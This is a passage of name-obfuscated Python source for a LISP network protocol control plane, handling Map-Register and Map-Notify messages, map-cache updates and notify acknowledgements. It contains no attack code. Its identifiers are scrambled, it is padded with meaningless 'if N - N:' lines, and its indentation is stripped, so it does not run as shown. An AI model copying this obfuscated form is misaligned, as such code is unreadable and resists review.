packet = oOiI111IIIiIii . end_of_rlocs ( packet ,
IiOo0oOoooO . rloc_count - I1I1II1iI - 1 )
break
if 60 - 60: i11iIiiIii . Oo0Ooo / iIii1I11I1II1 / II111iiii
if 31 - 31: Oo0Ooo / Oo0Ooo / iIii1I11I1II1 / I11i % OoooooooOO
if 90 - 90: I1IiiI
if 35 - 35: O0
if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
OooOOoOO0OO = lisp_rloc ( )
OooOOoOO0OO . store_rloc_from_record ( oOiI111IIIiIii , None , source )
if 78 - 78: I1IiiI - iIii1I11I1II1
if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
if 85 - 85: I11i + OoOoOO00 * O0 * O0
if 92 - 92: i11iIiiIii
if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
if ( source . is_exact_match ( OooOOoOO0OO . rloc ) ) :
OooOOoOO0OO . map_notify_requested = o0OOOo00o00O00 . map_notify_requested
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
if 42 - 42: OoOoOO00 . I11i % II111iiii
if 19 - 19: OoooooooOO
i1iI11i . registered_rlocs . append ( OooOOoOO0OO )
if 31 - 31: I11i . OoOoOO00 - O0 * iII111i % I1Ii111 - II111iiii
if 21 - 21: OOooOOo . Oo0Ooo - i1IIi
ooOoo0o0oO = ( i1iI11i . do_rloc_sets_match ( o00o0o ) == False )
if 21 - 21: i1IIi / ooOoO0o % ooOoO0o - IiII * Oo0Ooo
if 93 - 93: OoO0O00 + O0
if 36 - 36: i1IIi * oO0o
if 51 - 51: iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * Oo0Ooo . I1ii11iIi11i - oO0o
if 91 - 91: OOooOOo % OoooooooOO
if 52 - 52: OOooOOo + OoO0O00
if ( o0OOOo00o00O00 . map_register_refresh and ooOoo0o0oO and
i1iI11i . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
i1iI11i . registered_rlocs = o00o0o
continue
if 96 - 96: OOooOOo % O0 - Oo0Ooo % oO0o / I1IiiI . i1IIi
if 42 - 42: i1IIi
if 52 - 52: OoO0O00 % iII111i % O0
if 11 - 11: i1IIi / i11iIiiIii + Ii1I % Oo0Ooo % O0
if 50 - 50: oO0o . I1Ii111
if 38 - 38: iIii1I11I1II1 . Ii1I
if ( i1iI11i . registered == False ) :
i1iI11i . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 82 - 82: OOooOOo * Ii1I + I1ii11iIi11i . OoO0O00
i1iI11i . last_registered = lisp_get_timestamp ( )
i1iI11i . registered = ( IiOo0oOoooO . record_ttl != 0 )
i1iI11i . last_registerer = source
if 15 - 15: O0
if 44 - 44: Ii1I . Oo0Ooo . I1Ii111 + oO0o
if 32 - 32: OOooOOo - II111iiii + IiII * iIii1I11I1II1 - Oo0Ooo
if 25 - 25: ooOoO0o
i1iI11i . auth_sha1_or_sha2 = I1iiIIiIII1i
i1iI11i . proxy_reply_requested = o0OOOo00o00O00 . proxy_reply_requested
i1iI11i . lisp_sec_present = o0OOOo00o00O00 . lisp_sec_present
i1iI11i . map_notify_requested = o0OOOo00o00O00 . map_notify_requested
i1iI11i . mobile_node_requested = o0OOOo00o00O00 . mobile_node
i1iI11i . merge_register_requested = o0OOOo00o00O00 . merge_register_requested
if 33 - 33: Oo0Ooo
i1iI11i . use_register_ttl_requested = o0OOOo00o00O00 . use_ttl_for_timeout
if ( i1iI11i . use_register_ttl_requested ) :
i1iI11i . register_ttl = IiOo0oOoooO . store_ttl ( )
else :
i1iI11i . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 11 - 11: I11i
i1iI11i . xtr_id_present = o0OOOo00o00O00 . xtr_id_present
if ( i1iI11i . xtr_id_present ) :
i1iI11i . xtr_id = o0OOOo00o00O00 . xtr_id
i1iI11i . site_id = o0OOOo00o00O00 . site_id
if 55 - 55: i11iIiiIii * OoOoOO00 - OoOoOO00 * OoO0O00 / iII111i
if 64 - 64: iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
if 53 - 53: iIii1I11I1II1 * oO0o
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
if ( o0OOOo00o00O00 . merge_register_requested ) :
if ( O0O0oO00 . merge_in_site_eid ( i1iI11i ) ) :
OOoOOo00 . append ( [ IiOo0oOoooO . eid , IiOo0oOoooO . group ] )
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
if ( o0OOOo00o00O00 . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , O0O0oO00 , o0OOOo00o00O00 ,
IiOo0oOoooO )
if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
if 60 - 60: oO0o * I1Ii111
if ( ooOoo0o0oO == False ) : continue
if ( len ( OOoOOo00 ) != 0 ) : continue
if 81 - 81: oO0o - OOooOOo - oO0o
I1i111i1ii11 . append ( i1iI11i . print_eid_tuple ( ) )
if 54 - 54: oO0o % I11i
if 71 - 71: oO0o / I1ii11iIi11i . Ii1I % II111iiii
if 22 - 22: iIii1I11I1II1 - OoooooooOO
if 8 - 8: ooOoO0o % i11iIiiIii
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
OO00o = copy . deepcopy ( IiOo0oOoooO )
IiOo0oOoooO = IiOo0oOoooO . encode ( )
IiOo0oOoooO += IiIIiiii
oo0OO = [ i1iI11i . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 81 - 81: I11i
for OooOOoOO0OO in o00o0o :
if ( OooOOoOO0OO . map_notify_requested == False ) : continue
if ( OooOOoOO0OO . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , IiOo0oOoooO , oo0OO , 1 , OooOOoOO0OO . rloc ,
LISP_CTRL_PORT , o0OOOo00o00O00 . nonce , o0OOOo00o00O00 . key_id ,
o0OOOo00o00O00 . alg_id , o0OOOo00o00O00 . auth_len , iI1I1ii , False )
if 28 - 28: i11iIiiIii . OoooooooOO . iIii1I11I1II1 . Ii1I / i1IIi
if 3 - 3: i11iIiiIii % Ii1I
if 10 - 10: iII111i * oO0o + O0
if 35 - 35: OoOoOO00 . oO0o / II111iiii
if 97 - 97: Ii1I + I1Ii111 / II111iiii
lisp_notify_subscribers ( lisp_sockets , OO00o , IiIIiiii ,
i1iI11i . eid , iI1I1ii )
if 14 - 14: iII111i / IiII / oO0o
if 55 - 55: OoO0O00 % O0
if 92 - 92: OoooooooOO / O0
if 14 - 14: i11iIiiIii
if 43 - 43: OOooOOo
if ( len ( OOoOOo00 ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , OOoOOo00 )
if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
if 93 - 93: OoOoOO00
if 49 - 49: i1IIi * OOooOOo % I11i * Ii1I . I1Ii111 * iIii1I11I1II1
if 72 - 72: ooOoO0o
if 63 - 63: Oo0Ooo . OoO0O00 . OoooooooOO / i1IIi
if 53 - 53: OOooOOo * O0 . iII111i
if ( o0OOOo00o00O00 . merge_register_requested ) : return
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
if 78 - 78: iII111i
if 80 - 80: i1IIi * I1IiiI + OOooOOo
if 91 - 91: I1IiiI % OoOoOO00 * Oo0Ooo / I1ii11iIi11i
if 57 - 57: i11iIiiIii / o0oOOo0O0Ooo . II111iiii
if ( o0OOOo00o00O00 . map_notify_requested and iI1I1ii != None ) :
lisp_build_map_notify ( lisp_sockets , OooOo , I1i111i1ii11 ,
o0OOOo00o00O00 . record_count , source , sport , o0OOOo00o00O00 . nonce ,
o0OOOo00o00O00 . key_id , o0OOOo00o00O00 . alg_id , o0OOOo00o00O00 . auth_len ,
iI1I1ii , True )
if 63 - 63: O0
return
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
if 74 - 74: i11iIiiIii
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
if 6 - 6: I11i
if 70 - 70: ooOoO0o + OoooooooOO % OoOoOO00 % oO0o / Ii1I . I11i
def lisp_process_unicast_map_notify ( lisp_sockets , packet , source ) :
IIiiIiI = lisp_map_notify ( "" )
packet = IIiiIiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 63 - 63: I1ii11iIi11i - ooOoO0o . OOooOOo / O0 . iIii1I11I1II1 - Ii1I
if 6 - 6: Ii1I
IIiiIiI . print_notify ( )
if ( IIiiIiI . record_count == 0 ) : return
if 60 - 60: iII111i + I1IiiI
Iii = IIiiIiI . eid_records
if 6 - 6: I1Ii111 + i1IIi - Ii1I % iIii1I11I1II1 . Oo0Ooo
for OoOOoO0oOo in range ( IIiiIiI . record_count ) :
IiOo0oOoooO = lisp_eid_record ( )
Iii = IiOo0oOoooO . decode ( Iii )
if ( packet == None ) : return
IiOo0oOoooO . print_record ( " " , False )
iIiI1I1ii1I1 = IiOo0oOoooO . print_eid_tuple ( )
if 44 - 44: iIii1I11I1II1 - II111iiii . IiII . i1IIi
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
if 43 - 43: I1ii11iIi11i + I11i
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
I11 = lisp_map_cache_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . eid )
if ( I11 == None ) :
I1i = green ( iIiI1I1ii1I1 , False )
lprint ( "Ignoring Map-Notify EID {}, no subscribe-request entry" . format ( I1i ) )
if 100 - 100: IiII - OoOoOO00 / I11i
continue
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if 87 - 87: Oo0Ooo
if 65 - 65: ooOoO0o . I1IiiI
if 51 - 51: IiII
if 43 - 43: oO0o - I11i . i11iIiiIii
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
if 30 - 30: I1IiiI % oO0o * OoooooooOO
if ( I11 . action != LISP_SEND_PUBSUB_ACTION ) :
if ( I11 . subscribed_eid == None ) :
I1i = green ( iIiI1I1ii1I1 , False )
lprint ( "Ignoring Map-Notify for non-subscribed EID {}" . format ( I1i ) )
if 64 - 64: I1IiiI
continue
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
if 67 - 67: I1IiiI * Ii1I
o00o0OO0o = [ ]
if ( I11 . action == LISP_SEND_PUBSUB_ACTION ) :
I11 = lisp_mapping ( IiOo0oOoooO . eid , IiOo0oOoooO . group , [ ] )
I11 . add_cache ( )
O0oooo = copy . deepcopy ( IiOo0oOoooO . eid )
oOOooOOo = copy . deepcopy ( IiOo0oOoooO . group )
else :
O0oooo = I11 . subscribed_eid
oOOooOOo = I11 . subscribed_group
o00o0OO0o = I11 . rloc_set
I11 . delete_rlocs_from_rloc_probe_list ( )
I11 . rloc_set = [ ]
if 4 - 4: ooOoO0o . i11iIiiIii . i1IIi
if 37 - 37: i11iIiiIii + OoO0O00 * Ii1I
if 100 - 100: IiII . I1Ii111 + II111iiii + i1IIi
if 37 - 37: iII111i
if 27 - 27: iII111i / Ii1I / iII111i + OoooooooOO - O0 + OoO0O00
I11 . mapping_source = None if source == "lisp-itr" else source
I11 . map_cache_ttl = IiOo0oOoooO . store_ttl ( )
I11 . subscribed_eid = O0oooo
I11 . subscribed_group = oOOooOOo
if 62 - 62: iIii1I11I1II1
if 60 - 60: Oo0Ooo % IiII % OoO0O00 - i11iIiiIii
if 53 - 53: i11iIiiIii + OoooooooOO
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if ( len ( o00o0OO0o ) != 0 and IiOo0oOoooO . rloc_count == 0 ) :
I11 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11 )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( iIiI1I1ii1I1 , False ) ) )
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
continue
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
if 17 - 17: I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
if 51 - 51: IiII
if 31 - 31: I11i - iIii1I11I1II1 * Ii1I + Ii1I
iiiiIIiiII1Iii1 = II1iii11I = 0
for I1I1II1iI in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
Iii = oOiI111IIIiIii . decode ( Iii , None )
oOiI111IIIiIii . print_record ( " " )
if 2 - 2: o0oOOo0O0Ooo - II111iiii . i11iIiiIii . iII111i . OOooOOo
if 95 - 95: O0 - OoOoOO00
if 68 - 68: ooOoO0o . I1Ii111
if 84 - 84: OoooooooOO + oO0o % i1IIi + o0oOOo0O0Ooo * i1IIi
iIi111Ii1 = False
for I1I1iIiiiiII11 in o00o0OO0o :
if ( I1I1iIiiiiII11 . rloc . is_exact_match ( oOiI111IIIiIii . rloc ) ) :
iIi111Ii1 = True
break
if 51 - 51: oO0o . OoooooooOO + OOooOOo * I1ii11iIi11i - ooOoO0o
if 41 - 41: Oo0Ooo
if ( iIi111Ii1 ) :
OooOOoOO0OO = copy . deepcopy ( I1I1iIiiiiII11 )
II1iii11I += 1
else :
OooOOoOO0OO = lisp_rloc ( )
iiiiIIiiII1Iii1 += 1
if 46 - 46: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii . iII111i
if 66 - 66: oO0o % i1IIi % OoooooooOO
if 58 - 58: OOooOOo
if 89 - 89: iIii1I11I1II1 - i1IIi
if 26 - 26: OOooOOo - iII111i * I1ii11iIi11i / iII111i
OooOOoOO0OO . store_rloc_from_record ( oOiI111IIIiIii , None , I11 . mapping_source )
I11 . rloc_set . append ( OooOOoOO0OO )
if 9 - 9: I1Ii111 / II111iiii * I1Ii111 / I11i - OoO0O00
if 36 - 36: IiII . OoOoOO00 . Ii1I
lprint ( "Update {} map-cache entry with {}/{} new/replaced RLOCs" . format ( green ( iIiI1I1ii1I1 , False ) , iiiiIIiiII1Iii1 , II1iii11I ) )
if 31 - 31: iIii1I11I1II1
if 84 - 84: I1ii11iIi11i - iII111i * I1IiiI
if 88 - 88: OOooOOo / Oo0Ooo
if 31 - 31: II111iiii
if 32 - 32: o0oOOo0O0Ooo % o0oOOo0O0Ooo
I11 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11 )
if 67 - 67: IiII + oO0o * IiII
if 26 - 26: I1ii11iIi11i + i1IIi . i1IIi - oO0o + I1IiiI * o0oOOo0O0Ooo
if 62 - 62: ooOoO0o + ooOoO0o % I11i
if 100 - 100: II111iiii . OoooooooOO
if 32 - 32: I11i % OOooOOo * O0 / iIii1I11I1II1 / i1IIi
if 87 - 87: OoO0O00 . I1ii11iIi11i * I1IiiI
OoOoO = lisp_get_map_server ( source )
if ( OoOoO == None ) :
lprint ( "Cannot find Map-Server for Map-Notify source address {}" . format ( source . print_address_no_iid ( ) ) )
if 83 - 83: OOooOOo
return
if 86 - 86: I1Ii111 / oO0o
lisp_send_map_notify_ack ( lisp_sockets , Iii , IIiiIiI , OoOoO )
if 67 - 67: OoOoOO00 + Oo0Ooo / i11iIiiIii . I1IiiI
if 53 - 53: Oo0Ooo + IiII * ooOoO0o % OoooooooOO * oO0o . iII111i
if 78 - 78: O0 . Ii1I - I1ii11iIi11i
if 69 - 69: O0 % O0 . oO0o * OoooooooOO
if 13 - 13: i1IIi % oO0o . OoooooooOO + I1ii11iIi11i - OOooOOo
if 99 - 99: OoooooooOO % OOooOOo / I11i
if 77 - 77: II111iiii - IiII % OOooOOo
if 22 - 22: OoooooooOO / oO0o
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
def lisp_process_multicast_map_notify ( packet , source ) :
IIiiIiI = lisp_map_notify ( "" )
packet = IIiiIiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 12 - 12: I1Ii111
if 17 - 17: I1Ii111 % oO0o + O0
IIiiIiI . print_notify ( )
if ( IIiiIiI . record_count == 0 ) : return
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
Iii = IIiiIiI . eid_records
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
for OoOOoO0oOo in range ( IIiiIiI . record_count ) :
IiOo0oOoooO = lisp_eid_record ( )
Iii = IiOo0oOoooO . decode ( Iii )
if ( packet == None ) : return
IiOo0oOoooO . print_record ( " " , False )
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
I11 = lisp_map_cache_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . group )
if ( I11 == None ) :
oOOOo , ooooO00o0 , o00oOo0O0OO = lisp_allow_gleaning ( IiOo0oOoooO . eid , IiOo0oOoooO . group ,
None )
if ( oOOOo == False ) : continue
if 16 - 16: OoOoOO00 * iII111i . O0
I11 = lisp_mapping ( IiOo0oOoooO . eid , IiOo0oOoooO . group , [ ] )
I11 . add_cache ( )
if 60 - 60: IiII . I11i * Oo0Ooo . i1IIi
if 3 - 3: Ii1I
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if ( I11 . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( I11 . print_eid_tuple ( ) , False ) ) )
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
continue
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
I11 . mapping_source = None if source == "lisp-etr" else source
I11 . map_cache_ttl = IiOo0oOoooO . store_ttl ( )
if 13 - 13: IiII + Oo0Ooo - I1Ii111
if 10 - 10: OOooOOo % OoooooooOO / I1IiiI . II111iiii % iII111i
if 47 - 47: o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - ooOoO0o * oO0o
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if ( len ( I11 . rloc_set ) != 0 and IiOo0oOoooO . rloc_count == 0 ) :
I11 . rloc_set = [ ]
I11 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11 )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( I11 . print_eid_tuple ( ) , False ) ) )
if 39 - 39: OoO0O00 + II111iiii
continue
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
o00OOo0 = I11 . rtrs_in_rloc_set ( )
if 61 - 61: OoooooooOO * II111iiii
if 49 - 49: oO0o - I1IiiI . IiII / i11iIiiIii
if 1 - 1: Ii1I
if 97 - 97: Oo0Ooo - iII111i / I1ii11iIi11i
if 49 - 49: iII111i + I11i . Oo0Ooo
for I1I1II1iI in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
Iii = oOiI111IIIiIii . decode ( Iii , None )
oOiI111IIIiIii . print_record ( " " )
if ( IiOo0oOoooO . group . is_null ( ) ) : continue
if ( oOiI111IIIiIii . rle == None ) : continue
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
Ooo0oOo = I11 . rloc_set [ 0 ] . stats if len ( I11 . rloc_set ) != 0 else None
if 63 - 63: I11i + i11iIiiIii . o0oOOo0O0Ooo . i1IIi + OoOoOO00
if 1 - 1: i11iIiiIii
if 1 - 1: iIii1I11I1II1
if 73 - 73: iII111i + IiII
OooOOoOO0OO = lisp_rloc ( )
OooOOoOO0OO . store_rloc_from_record ( oOiI111IIIiIii , None , I11 . mapping_source )
if ( Ooo0oOo != None ) : OooOOoOO0OO . stats = copy . deepcopy ( Ooo0oOo )
if 95 - 95: O0
if ( o00OOo0 and OooOOoOO0OO . is_rtr ( ) == False ) : continue
if 75 - 75: ooOoO0o
I11 . rloc_set = [ OooOOoOO0OO ]
I11 . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , I11 )
if 8 - 8: O0 - OoooooooOO + I1ii11iIi11i / Oo0Ooo . oO0o + I1Ii111
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( I11 . print_eid_tuple ( ) , False ) ,
# ooOoO0o . I1IiiI / iII111i . OoO0O00 % I1ii11iIi11i * I11i
OooOOoOO0OO . rle . print_rle ( False , True ) ) )
if 37 - 37: iIii1I11I1II1 / I1ii11iIi11i * oO0o / iIii1I11I1II1
if 45 - 45: IiII
return
if 49 - 49: I1IiiI . Ii1I * I1IiiI - OoooooooOO . I11i / I1Ii111
if 9 - 9: iIii1I11I1II1 * Ii1I / O0 - OOooOOo
if 95 - 95: i11iIiiIii * II111iiii * OOooOOo * iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 / I1IiiI + OoOoOO00 - OOooOOo . i11iIiiIii / i11iIiiIii
if 10 - 10: iIii1I11I1II1 % i1IIi
if 78 - 78: I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
if 44 - 44: I1ii11iIi11i
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
IIiiIiI = lisp_map_notify ( "" )
OO0Oo00OO0oo = IIiiIiI . decode ( orig_packet )
if ( OO0Oo00OO0oo == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 39 - 39: iII111i + Oo0Ooo / oO0o
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
IIiiIiI . print_notify ( )
if 99 - 99: I1IiiI * II111iiii
if 84 - 84: II111iiii - I1IiiI
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
if 35 - 35: I11i + i1IIi
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
I1iiIi111I = source . print_address ( )
if ( IIiiIiI . alg_id != 0 or IIiiIiI . auth_len != 0 ) :
OoOoO = None
for III11II111 in lisp_map_servers_list :
if ( III11II111 . find ( I1iiIi111I ) == - 1 ) : continue
OoOoO = lisp_map_servers_list [ III11II111 ]
if 97 - 97: oO0o % iIii1I11I1II1
if ( OoOoO == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( I1iiIi111I ) )
if 87 - 87: II111iiii % I1IiiI + oO0o - I11i / I11i
return
if 16 - 16: I1IiiI
if 39 - 39: ooOoO0o * II111iiii
OoOoO . map_notifies_received += 1
if 90 - 90: OoooooooOO * ooOoO0o
O0oOO0OO0OO0 = lisp_verify_auth ( OO0Oo00OO0oo , IIiiIiI . alg_id ,
IIiiIiI . auth_data , OoOoO . password )
if 14 - 14: I1IiiI % i1IIi
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if O0oOO0OO0OO0 else "failed" ) )
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if ( O0oOO0OO0OO0 == False ) : return
else :
OoOoO = lisp_ms ( I1iiIi111I , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
if 55 - 55: i1IIi
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
Iii = IIiiIiI . eid_records
if ( IIiiIiI . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , Iii , IIiiIiI , OoOoO )
return
if 90 - 90: i11iIiiIii - iII111i * oO0o
if 79 - 79: IiII
if 38 - 38: I1Ii111
if 56 - 56: i11iIiiIii
if 58 - 58: i11iIiiIii / OoOoOO00
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
IiOo0oOoooO = lisp_eid_record ( )
OO0Oo00OO0oo = IiOo0oOoooO . decode ( Iii )
if ( OO0Oo00OO0oo == None ) : return
if 100 - 100: ooOoO0o / OoooooooOO
IiOo0oOoooO . print_record ( " " , False )
if 73 - 73: i11iIiiIii - Oo0Ooo
for I1I1II1iI in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
OO0Oo00OO0oo = oOiI111IIIiIii . decode ( OO0Oo00OO0oo , None )
if ( OO0Oo00OO0oo == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 100 - 100: iIii1I11I1II1 + I1Ii111
oOiI111IIIiIii . print_record ( " " )
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
if 84 - 84: Oo0Ooo * OoOoOO00 / Ii1I / IiII / o0oOOo0O0Ooo . I1ii11iIi11i
if 81 - 81: I1IiiI
if 82 - 82: I1Ii111 - OoooooooOO - Ii1I
if ( IiOo0oOoooO . group . is_null ( ) == False ) :
if 34 - 34: OOooOOo . iIii1I11I1II1 / I1IiiI . Oo0Ooo - iIii1I11I1II1
if 83 - 83: iII111i - I1ii11iIi11i + iII111i
if 4 - 4: o0oOOo0O0Ooo % iIii1I11I1II1 + I11i
if 60 - 60: I1ii11iIi11i / I1Ii111 % i11iIiiIii % oO0o % I1IiiI . Oo0Ooo
if 20 - 20: IiII - OOooOOo + OoOoOO00
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( IiOo0oOoooO . print_eid_tuple ( ) , False ) ) )
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
if 74 - 74: OoO0O00
ii1I11Iii = lisp_control_packet_ipc ( orig_packet , I1iiIi111I , "lisp-itr" , 0 )
lisp_ipc ( ii1I11Iii , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
lisp_send_map_notify_ack ( lisp_sockets , Iii , IIiiIiI , OoOoO )
return
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
def lisp_process_map_notify_ack ( packet , source ) :
IIiiIiI = lisp_map_notify ( "" )
packet = IIiiIiI . decode ( packet )
if ( packet == None ) :
